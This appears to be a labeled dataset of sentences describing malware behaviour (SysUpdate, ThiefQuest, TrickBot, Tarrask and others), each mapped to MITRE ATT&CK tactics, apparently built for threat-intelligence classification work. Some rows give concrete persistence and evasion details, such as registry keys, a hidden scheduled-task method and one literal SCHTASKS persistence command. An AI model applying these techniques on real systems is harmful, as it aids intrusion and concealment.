Sys10 collects the group name of the logged-in user and sends it to the C2.,['TA0007:Discovery']
Sys10 uses an XOR 0x1 loop to encrypt its C2 domain.,['TA0011:Command and Control']
"Sys10 collects the computer name, OS versioning information, and OS install date and sends the information to the C2.",['TA0007:Discovery']
Sys10 collects the local IP address of the victim and sends it to the C2.,['TA0007:Discovery']
Sys10 collects the account name of the logged-in user and sends it to the C2.,['TA0007:Discovery']
Sys10 uses HTTP for C2.,['TA0011:Command and Control']
SysUpdate has been signed with stolen digital certificates.,['TA0005:Defense Evasion']
SysUpdate can load DLLs through vulnerable legitimate executables.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
SysUpdate has used DNS TXT requests as for its C2 communication.,['TA0011:Command and Control']
SysUpdate can collect information and files from a compromised host.,['TA0009:Collection']
SysUpdate can deobfuscate packed binaries in memory.,['TA0005:Defense Evasion']
SysUpdate can encrypt and encode its configuration file.,['TA0005:Defense Evasion']
SysUpdate has exfiltrated data over its C2 channel.,['TA0010:Exfiltration']
SysUpdate can delete its configuration file from the targeted system.,['TA0005:Defense Evasion']
SysUpdate can search files on a compromised host.,['TA0007:Discovery']
SysUpdate can store its encoded configuration file within Software\Classes\scConfig in either HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER.,['TA0005:Defense Evasion']
SysUpdate has the ability to set file attributes to hidden.,['TA0005:Defense Evasion']
SysUpdate has the ability to download files to a compromised host.,['TA0011:Command and Control']
SysUpdate can contact the DNS server operated by Google as part of its C2 establishment process.,['TA0007:Discovery']
"SysUpdate has named their unit configuration file similarly to other unit files residing in the same directory, `/usr/lib/systemd/system/`, to appear benign.",['TA0005:Defense Evasion']
SysUpdate can write its configuration file to Software\Classes\scConfig in either HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER.,['TA0005:Defense Evasion']
SysUpdate can call the `GetNetworkParams` API as part of its C2 establishment process.,['TA0002:Execution']
SysUpdate can collect information about running processes.,['TA0007:Discovery']
SysUpdate can use a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SysUpdate has the ability to capture screenshots.,['TA0009:Collection']
SysUpdate can manage services and processes.,['TA0002:Execution']
SysUpdate has been packed with VMProtect.,['TA0005:Defense Evasion']
SysUpdate has used Base64 to encode its C2 traffic.,['TA0011:Command and Control']
SysUpdate has used DES to encrypt all C2 communications.,['TA0011:Command and Control']
"SysUpdate can collect a system's architecture, operating system version, hostname, and drive information.",['TA0007:Discovery']
SysUpdate can collected the IP address and domain name of a compromised host.,['TA0007:Discovery']
SysUpdate can collect the username from a compromised host.,['TA0007:Discovery']
SysUpdate can collect a list of services on a victim machine.,['TA0007:Discovery']
"SysUpdate can copy a script to the user owned `/usr/lib/systemd/system/` directory with a symlink mapped to a `root` owned directory, `/etc/ystem/system`, in the unit configuration file's `ExecStart` directive to establish persistence and elevate privileges.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SysUpdate can use WMI for execution on a compromised host.,['TA0002:Execution']
SysUpdate can create a service to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Systeminfo can be used to gather information about the operating system.,['TA0007:Discovery']
"If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll and HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
T9000 encrypts collected data using a single byte XOR key.,['TA0009:Collection']
T9000 uses the Skype API to record audio and video calls. It writes encrypted data to %APPDATA%\Intel\Skype.,['TA0009:Collection']
T9000 searches removable storage devices for files with a pre-defined list of file extensions . Any matching files are encrypted and written to a local user directory.,['TA0009:Collection']
"During the T9000 installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
T9000 searches through connected drives for removable storage devices.,['TA0007:Discovery']
"T9000 can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.",['TA0009:Collection']
T9000 performs checks for various antivirus and security products during installation.,['TA0007:Discovery']
T9000 gathers and beacons the operating system build number and CPU Architecture during installation.,['TA0007:Discovery']
T9000 gathers and beacons the MAC and IP addresses during installation.,['TA0007:Discovery']
T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.,['TA0007:Discovery']
T9000 gathers and beacons the system time during installation.,['TA0007:Discovery']
T9000 uses the Skype API to record audio and video calls. It writes encrypted data to %APPDATA%\Intel\Skype.,['TA0009:Collection']
TAINTEDSCRIBE has used FileReadZipSend to compress a file and send to C2.,['TA0009:Collection']
TAINTEDSCRIBE can execute FileRecvWriteRand to append random bytes to the end of a file received from C2.,['TA0005:Defense Evasion']
"TAINTEDSCRIBE can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.",['TA0011:Command and Control']
TAINTEDSCRIBE can delete files from a compromised host.,['TA0005:Defense Evasion']
TAINTEDSCRIBE can use DirectoryList to enumerate files in a specified directory.,['TA0007:Discovery']
TAINTEDSCRIBE can download additional modules from its C2 server.,['TA0011:Command and Control']
The TAINTEDSCRIBE main executable has disguised itself as Microsoft’s Narrator.,['TA0005:Defense Evasion']
TAINTEDSCRIBE can execute ProcessList for process discovery.,['TA0007:Discovery']
TAINTEDSCRIBE has used FakeTLS for session authentication.,['TA0011:Command and Control']
TAINTEDSCRIBE can copy itself into the current user’s Startup folder as “Narrator.exe” for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
The TAINTEDSCRIBE command and execution module can perform target system enumeration.,['TA0007:Discovery']
TAINTEDSCRIBE uses a Linear Feedback Shift Register algorithm for network encryption.,['TA0011:Command and Control']
TAINTEDSCRIBE can use DriveList to retrieve drive information.,['TA0007:Discovery']
TAINTEDSCRIBE can execute GetLocalTime for time discovery.,['TA0007:Discovery']
TAINTEDSCRIBE can change the timestamp of specified filenames.,['TA0005:Defense Evasion']
TAINTEDSCRIBE can enable Windows CLI access and execute files.,['TA0002:Execution']
TDTESS creates then deletes log files during installation of itself as a service.,['TA0005:Defense Evasion']
TDTESS has a command to download and execute an additional file.,['TA0011:Command and Control']
"After creating a new service for persistence, TDTESS sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.",['TA0005:Defense Evasion']
TDTESS provides a reverse shell on the victim.,['TA0002:Execution']
"If running as administrator, TDTESS installs itself as a new service named bmwappushservice to establish persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload.,['TA0005:Defense Evasion']
TEARDROP files had names that resembled legitimate Window file and directory names.,['TA0005:Defense Evasion']
TEARDROP modified the Registry to create a Windows service for itself on a compromised host.,['TA0005:Defense Evasion']
"TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.",['TA0005:Defense Evasion']
TEARDROP checked that HKU\SOFTWARE\Microsoft\CTF existed before decoding its embedded payload.,['TA0007:Discovery']
TEARDROP ran as a Windows service from the c:\windows\syswow64 folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TEXTMATE uses DNS TXT records for C2.,['TA0011:Command and Control']
TEXTMATE executes cmd.exe to provide a reverse shell to adversaries.,['TA0002:Execution']
"When a document is found matching one of the extensions in the configuration, TINYTYPHON uploads it to the C2 server.",['TA0010:Exfiltration']
TINYTYPHON has used XOR with 0x90 to obfuscate its configuration file.,['TA0005:Defense Evasion']
"TINYTYPHON searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.",['TA0007:Discovery']
TINYTYPHON installs itself under Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"TSCookie has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.",['TA0006:Credential Access']
"TSCookie has the ability to decrypt, load, and execute a DLL and its resources.",['TA0005:Defense Evasion']
TSCookie has the ability to discover drive information on the infected host.,['TA0007:Discovery']
TSCookie has the ability to upload and download files to and from the infected host.,['TA0011:Command and Control']
"TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.",['TA0002:Execution']
TSCookie can use ICMP to receive information on the destination server.,['TA0011:Command and Control']
TSCookie has the ability to list processes on the infected host.,['TA0007:Discovery']
"TSCookie has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
TSCookie has the ability to proxy communications with command and control servers.,['TA0011:Command and Control']
TSCookie has encrypted network communications with RC4.,['TA0011:Command and Control']
TSCookie has the ability to identify the IP of the infected host.,['TA0007:Discovery']
TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control servers.,['TA0011:Command and Control']
TSCookie has the ability to execute shell commands on the infected host.,['TA0002:Execution']
"TURNEDUP is capable of injecting code into the APC queue of a created Rundll32 process as part of an ""Early Bird injection.""","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
TURNEDUP is capable of downloading additional files.,['TA0011:Command and Control']
TURNEDUP is capable of writing to a Registry Run key to establish.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TURNEDUP is capable of taking screenshots.,['TA0009:Collection']
TURNEDUP is capable of gathering system information.,['TA0007:Discovery']
TURNEDUP is capable of creating a reverse shell.,['TA0002:Execution']
"One TYPEFRAME variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value ""0x35"".",['TA0005:Defense Evasion']
TYPEFRAME can open the Windows Firewall on the victim’s machine to allow incoming connections.,['TA0005:Defense Evasion']
APIs and strings in some TYPEFRAME variants are RC4 encrypted. Another variant is encoded with XOR.,['TA0005:Defense Evasion']
TYPEFRAME can delete files off the system.,['TA0005:Defense Evasion']
TYPEFRAME can search directories for files on the victim’s machine.,['TA0007:Discovery']
TYPEFRAME can install and store encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs.,['TA0005:Defense Evasion']
TYPEFRAME can upload and download files to the victim’s machine.,['TA0011:Command and Control']
A Word document delivering TYPEFRAME prompts the user to enable macro execution.,['TA0002:Execution']
TYPEFRAME can install encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs.,['TA0005:Defense Evasion']
"TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method.",['TA0011:Command and Control']
A TYPEFRAME variant can force the compromised system to function as a proxy server.,['TA0011:Command and Control']
TYPEFRAME can gather the disk volume information.,['TA0007:Discovery']
TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.,['TA0002:Execution']
TYPEFRAME can uninstall malware components using a batch script. TYPEFRAME can execute commands using a shell.,['TA0002:Execution']
TYPEFRAME variants can add malicious DLL modules as new services.TYPEFRAME can also delete services from the victim’s machine.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Taidoor can upload data and files from a victim's machine.,['TA0009:Collection']
Taidoor can use a stream cipher to decrypt stings used by the malware.,['TA0005:Defense Evasion']
Taidoor can perform DLL loading.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Taidoor can use encrypted string blocks for obfuscation.,['TA0005:Defense Evasion']
Taidoor can use DeleteFileA to remove files from infected hosts.,['TA0005:Defense Evasion']
Taidoor can search for specific files.,['TA0007:Discovery']
Taidoor has downloaded additional files onto a compromised host.,['TA0011:Command and Control']
Taidoor has relied upon a victim to click on a malicious email attachment.,['TA0002:Execution']
Taidoor has the ability to modify the Registry on compromised hosts using RegDeleteValueA and RegCreateKeyExA.,['TA0005:Defense Evasion']
"Taidoor has the ability to use native APIs for execution including GetProcessHeap, GetProcAddress, and LoadLibrary.",['TA0002:Execution']
Taidoor can use TCP for C2 communications.,['TA0011:Command and Control']
Taidoor can use GetCurrentProcessId for process discovery.,['TA0007:Discovery']
Taidoor can query the Registry on compromised hosts using RegQueryValueExA.,['TA0007:Discovery']
Taidoor has modified the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run key for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Taidoor has been delivered through spearphishing emails.,['TA0001:Initial Access']
Taidoor uses RC4 to encrypt the message body of HTTP content.,['TA0011:Command and Control']
Taidoor has collected the MAC address of a compromised host; it can also use GetAdaptersInfo to identify network adapters.,['TA0007:Discovery']
Taidoor can use GetLocalTime and GetSystemTime to collect system time.,['TA0007:Discovery']
Taidoor has used HTTP GET and POST requests for C2.,['TA0011:Command and Control']
Taidoor can copy cmd.exe into the system temp folder.,['TA0002:Execution']
TajMahal has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.,['TA0009:Collection']
TajMahal has the ability to capture VoiceIP application audio on an infected host.,['TA0009:Collection']
TajMahal has the ability to index and compress files into a send queue for exfiltration.,['TA0009:Collection']
TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.,['TA0010:Exfiltration']
TajMahal has the ability to steal data from the clipboard of an infected host.,['TA0009:Collection']
TajMahal has the ability to steal documents from the local system including the print spooler queue.,['TA0009:Collection']
TajMahal has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.,['TA0009:Collection']
TajMahal has the ability to inject DLLs for malicious plugins into running processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
TajMahal has the ability to send collected files over its C2.,['TA0010:Exfiltration']
"TajMahal has the ability to index files from drives, user profiles, and removable drives.",['TA0007:Discovery']
TajMahal has the ability to capture keystrokes on an infected host.,"['TA0009:Collection', 'TA0006:Credential Access']"
TajMahal can set the KeepPrintedJobs attribute for configured printers in SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers to enable document stealing.,['TA0005:Defense Evasion']
TajMahal has used an encrypted Virtual File System to store plugins.,['TA0005:Defense Evasion']
TajMahal has the ability to identify connected Apple devices.,['TA0007:Discovery']
TajMahal has the ability to identify running processes and associated plugins on an infected host.,['TA0007:Discovery']
TajMahal has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.,['TA0009:Collection']
"TajMahal has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.",['TA0007:Discovery']
TajMahal has the ability to inject the LoadLibrary call template DLL into running processes.,['TA0002:Execution']
TajMahal has the ability to identify the Internet Explorer version on an infected host.,['TA0007:Discovery']
"TajMahal has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.",['TA0006:Credential Access']
"TajMahal has the ability to identify hardware information, the computer name, and OS information on an infected host.",['TA0007:Discovery']
TajMahal has the ability to identify the MAC address on an infected host.,['TA0007:Discovery']
TajMahal has the ability to determine local time on a compromised host.,['TA0007:Discovery']
TajMahal has the ability to capture webcam video.,['TA0009:Collection']
Tarrask is able to create “hidden” scheduled tasks by deleting the Security Descriptor registry value.,['TA0005:Defense Evasion']
Tarrask creates a scheduled task called “WinUpdate” to re-establish any dropped C2 connections.,['TA0005:Defense Evasion']
"Tarrask has masqueraded as executable files such as `winupdate.exe`, `date.exe`, or `win.exe`.",['TA0005:Defense Evasion']
Tarrask is able to delete the Security Descriptor registry subkey in order to “hide” scheduled tasks.,['TA0005:Defense Evasion']
Tarrask is able to create “hidden” scheduled tasks for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Tarrask leverages token theft to obtain `lsass.exe` security permissions.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Tarrask may abuse the Windows schtasks command-line tool to create ""hidden"" scheduled tasks.",['TA0002:Execution']
Tasklist can be used to discover processes running on a system.,['TA0007:Discovery']
Tasklist can be used to enumerate security software currently running on a system by process name of known products.,['TA0007:Discovery']
Tasklist can be used to discover services running on a system.,['TA0007:Discovery']
ThiefQuest uses AppleScript's osascript -e command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon.,['TA0002:Execution']
"ThiefQuest searches through the /Users/ folder looking for executable files. For each executable, ThiefQuest prepends a copy of itself to the beginning of the file. When the file is executed, the ThiefQuest code is executed first. ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior.",['TA0003:Persistence']
"ThiefQuest encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.",['TA0040:Impact']
ThiefQuest uses a function named is_debugging to perform anti-debugging logic. The function invokes sysctl checking the returned value of P_TRACED. ThiefQuest also calls ptrace with the PTRACE_DENY_ATTACH flag to prevent debugging.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
ThiefQuest uses the function kill_unwanted to obtain a list of running processes and kills each process matching a list of security related processes.,['TA0005:Defense Evasion']
ThiefQuest exfiltrates targeted file extensions in the /Users/ folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.,['TA0010:Exfiltration']
ThiefQuest hides a copy of itself in the user's ~/Library directory by using a . at the beginning of the file name followed by 9 random characters.,['TA0005:Defense Evasion']
ThiefQuest can download and execute payloads in-memory or from disk.,['TA0011:Command and Control']
ThiefQuest uses the CGEventTap functions to perform keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
ThiefQuest installs a launch item using an embedded encrypted launch agent property list template. The plist file is installed in the ~/Library/LaunchAgents/ folder and configured with the path to the persistent binary located in the ~/Library/ folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the /Library/LaunchDaemons/ folder with the RunAtLoad key set to true establishing persistence as a Launch Daemon.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ThiefQuest prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.,['TA0005:Defense Evasion']
ThiefQuest uses various API to perform behaviors such as executing payloads and performing local enumeration.,['TA0002:Execution']
ThiefQuest obtains a list of running processes using the function kill_unwanted.,['TA0007:Discovery']
ThiefQuest uses various API functions such as NSCreateObjectFileImageFromMemory to load and link in-memory payloads.,['TA0005:Defense Evasion']
"ThiefQuest uses the kill_unwanted function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs.",['TA0007:Discovery']
"ThiefQuest invokes time call to check the system's time, executes a sleep command, invokes a second time call, and then compares the time difference between the two time calls and the amount of time the system slept to identify the sandbox.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
ThiefQuest uploads files via unencrypted HTTP.,['TA0011:Command and Control']
ThreatNeedle can collect data and files from a compromised host.,['TA0009:Collection']
"ThreatNeedle can decrypt its payload using RC4, AES, or one-byte XORing.",['TA0005:Defense Evasion']
"ThreatNeedle has been compressed and obfuscated using RC4, AES, or XOR.",['TA0005:Defense Evasion']
ThreatNeedle can obtain file and directory information.,['TA0007:Discovery']
ThreatNeedle can save its configuration data as a RC4-encrypted Registry key under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`.,['TA0005:Defense Evasion']
ThreatNeedle can download additional tools to enable lateral movement.,['TA0011:Command and Control']
ThreatNeedle relies on a victim to click on a malicious document for initial execution.,['TA0002:Execution']
ThreatNeedle chooses its payload creation path from a randomly selected service name from netsvc.,['TA0005:Defense Evasion']
ThreatNeedle can modify the Registry to save its configuration data as the following RC4-encrypted Registry key: `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameCon`.,['TA0005:Defense Evasion']
ThreatNeedle can be loaded into the Startup folder as a Shortcut file for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
ThreatNeedle has been distributed via a malicious Word document within a spearphishing email.,['TA0001:Initial Access']
ThreatNeedle can collect system profile information from a compromised host.,['TA0007:Discovery']
ThreatNeedle can run in memory and register its payload as a Windows service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TinyTurla has the ability to encrypt C2 traffic with SSL/TLS.,['TA0011:Command and Control']
TinyTurla can upload files from a compromised host.,['TA0009:Collection']
TinyTurla can go through a list of C2 server IPs and will try to register with each until one responds.,['TA0011:Command and Control']
TinyTurla can save its configuration parameters in the Registry.,['TA0005:Defense Evasion']
TinyTurla has the ability to act as a second-stage dropper used to infect the system with additional malware.,['TA0011:Command and Control']
TinyTurla has mimicked an existing Windows service by being installed as Windows Time Service.,['TA0005:Defense Evasion']
TinyTurla has been deployed as `w64time.dll` to appear legitimate.,['TA0005:Defense Evasion']
TinyTurla can set its configuration parameters in the Registry.,['TA0005:Defense Evasion']
"TinyTurla has used `WinHTTP`, `CreateProcess`, and other APIs for C2 communications and other functions.",['TA0002:Execution']
TinyTurla can query the Registry for its configuration information.,['TA0007:Discovery']
TinyTurla contacts its C2 based on a scheduled timing set in its configuration.,['TA0010:Exfiltration']
TinyTurla can install itself as a service on compromised machines.,['TA0002:Execution']
TinyTurla can use HTTPS in C2 communications.,['TA0011:Command and Control']
TinyTurla has been installed using a .bat file.,['TA0002:Execution']
TinyZBot contains functionality to collect information from the clipboard.,['TA0009:Collection']
TinyZBot can disable Avira anti-virus.,['TA0005:Defense Evasion']
TinyZBot contains keylogger functionality.,"['TA0009:Collection', 'TA0006:Credential Access']"
TinyZBot can create a shortcut in the Windows startup folder for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TinyZBot contains screen capture functionality.,['TA0009:Collection']
TinyZBot can create a shortcut in the Windows startup folder for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TinyZBot supports execution from the command-line.,['TA0002:Execution']
TinyZBot can install as a Windows service for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Tomiris has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration.,['TA0009:Collection']
"Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2.",['TA0011:Command and Control']
"Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.",['TA0010:Exfiltration']
Tomiris can download files and execute them on a victim's system.,['TA0011:Command and Control']
"Tomiris has used `SCHTASKS /CREATE /SC DAILY /TN StartDVL /TR ""path to self"" /ST 10:00` to establish persistence.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Tomiris has been packed with UPX.,['TA0005:Defense Evasion']
Tomiris has the ability to sleep for at least nine minutes to evade sandbox-based analysis systems.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Tomiris can use HTTP to establish C2 communications.,['TA0011:Command and Control']
"Tor encapsulates traffic in multiple layers of encryption, using TLS by default.",['TA0011:Command and Control']
Traffic traversing the Tor network will be forwarded to multiple nodes before exiting the Tor network and continuing on to its intended destination.,['TA0011:Command and Control']
Torisma has used XOR and Base64 to decode C2 data.,['TA0005:Defense Evasion']
Torisma has been Base64 encoded and AES encrypted.,['TA0005:Defense Evasion']
Torisma is only delivered to a compromised host if the victim's IP address is on an allow-list.,['TA0005:Defense Evasion']
Torisma can send victim data to an actor-controlled C2 server.,['TA0010:Exfiltration']
Torisma has used various Windows API calls.,['TA0002:Execution']
Torisma has been packed with Iz4 compression.,['TA0005:Defense Evasion']
Torisma has encoded C2 communications with Base64.,['TA0011:Command and Control']
Torisma has encrypted its C2 communications using XOR and VEST-32.,['TA0011:Command and Control']
Torisma can use `GetlogicalDrives` to get a bitmask of all drives available on a compromised system. It can also use `GetDriveType` to determine if a new drive is a CD-ROM drive.,['TA0007:Discovery']
Torisma can collect the local MAC address using `GetAdaptersInfo` as well as the system's IP address.,['TA0007:Discovery']
Torisma can use `WTSEnumerateSessionsW` to monitor remote desktop connections.,['TA0007:Discovery']
Torisma can collect the current time on a victim machine.,['TA0007:Discovery']
Torisma can use HTTP and HTTPS for C2 communications.,['TA0011:Command and Control']
TrailBlazer can masquerade its C2 traffic as legitimate Google Notifications HTTP requests.,['TA0011:Command and Control']
TrailBlazer has used random identifier strings to obscure its C2 operations and result codes.,['TA0011:Command and Control']
TrailBlazer has used filenames that match the name of the compromised system in attempt to avoid detection.,['TA0005:Defense Evasion']
TrailBlazer has used HTTP requests for C2.,['TA0011:Command and Control']
TrailBlazer has the ability to use WMI for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TrickBot can implant malicious code into a compromised device's firmware.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.,['TA0009:Collection']
TrickBot has come with a signed downloader component.,['TA0005:Defense Evasion']
TrickBot used COM to setup scheduled task for persistence.,['TA0002:Execution']
TrickBot has the ability to capture RDP credentials by capturing the CredEnumerateA API,"['TA0009:Collection', 'TA0006:Credential Access']"
TrickBot uses brute-force attack against RDP with rdpscanDll module.,['TA0006:Credential Access']
"TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the "".vnc.lnk"" affix to steal VNC credentials.",['TA0006:Credential Access']
"TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.",['TA0006:Credential Access']
TrickBot has retrieved PuTTY credentials by querying the Software\SimonTatham\Putty\Sessions registry key,['TA0006:Credential Access']
TrickBot collects local files and information from the victim’s local machine.,['TA0009:Collection']
TrickBot decodes the configuration data and modules.,['TA0005:Defense Evasion']
TrickBot can disable Windows Defender.,['TA0005:Defense Evasion']
TrickBot can gather information about domain trusts by utilizing Nltest.,['TA0007:Discovery']
TrickBot collects email addresses from Outlook.,['TA0007:Discovery']
TrickBot uses an AES CBC encryption algorithm for its loader and configuration files.,['TA0005:Defense Evasion']
TrickBot can send information about the compromised host and upload data to a hardcoded C2 server.,['TA0010:Exfiltration']
"TrickBot utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll.",['TA0008:Lateral Movement']
TrickBot has been known to reach a command and control server via one of nine proxy IP addresses.,['TA0011:Command and Control']
TrickBot can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.,['TA0011:Command and Control']
"TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.",['TA0007:Discovery']
"TrickBot module ""Trickboot"" can write or erase the UEFI/BIOS firmware of a compromised device.",['TA0040:Impact']
TrickBot has used a hidden VNC window to monitor the victim and collect information stealthily.,['TA0005:Defense Evasion']
TrickBot downloads several additional files and saves them to the victim's machine.,['TA0011:Command and Control']
TrickBot collects the users of the system.,['TA0007:Discovery']
TrickBot has attempted to get users to launch malicious documents to deliver its payload.,['TA0002:Execution']
The TrickBot downloader has used an icon to appear as a Microsoft Word document.,['TA0005:Defense Evasion']
TrickBot can modify registry entries.,['TA0005:Defense Evasion']
"TrickBot uses the Windows API call, CreateProcessW, to manage execution flow. TrickBot has also used Nt* API functions to perform Process Injection.",['TA0002:Execution']
TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.,['TA0007:Discovery']
Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443.,['TA0011:Command and Control']
TrickBot uses non-descriptive names to hide functionality.,['TA0005:Defense Evasion']
TrickBot can steal passwords from the KeePass open source password manager.,['TA0006:Credential Access']
TrickBot can identify the groups the user on a compromised host belongs to.,['TA0007:Discovery']
"TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers.",['TA0002:Execution']
TrickBot uses module networkDll for process list discovery.,['TA0007:Discovery']
TrickBot injects into the svchost.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
TrickBot has used Nt* Native API functions to inject code into legitimate processes such as wermgr.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
TrickBot establishes persistence in the Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
TrickBot uses vncDll module to remote control the victim machine.,['TA0011:Command and Control']
TrickBot can enumerate computers and network devices.,['TA0007:Discovery']
TrickBot creates a scheduled task on the system that provides persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
TrickBot leverages a custom packer to obfuscate its functionality.,['TA0005:Defense Evasion']
TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware,['TA0001:Initial Access']
TrickBot has been delivered via malicious links in phishing e-mails.,['TA0001:Initial Access']
TrickBot can Base64-encode C2 commands.,['TA0011:Command and Control']
TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.Newer versions of TrickBot have been known to use `bcrypt` to encrypt and digitally sign responses to their C2 server.,['TA0011:Command and Control']
"TrickBot gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim’s machine.",['TA0007:Discovery']
"TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.",['TA0007:Discovery']
TrickBot can identify the user and groups the user belongs to on a compromised host.,['TA0007:Discovery']
TrickBot collects a list of install programs and services on the system’s machine.,['TA0007:Discovery']
TrickBot has used printf and file I/O loops to delay process execution as part of API hammering.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
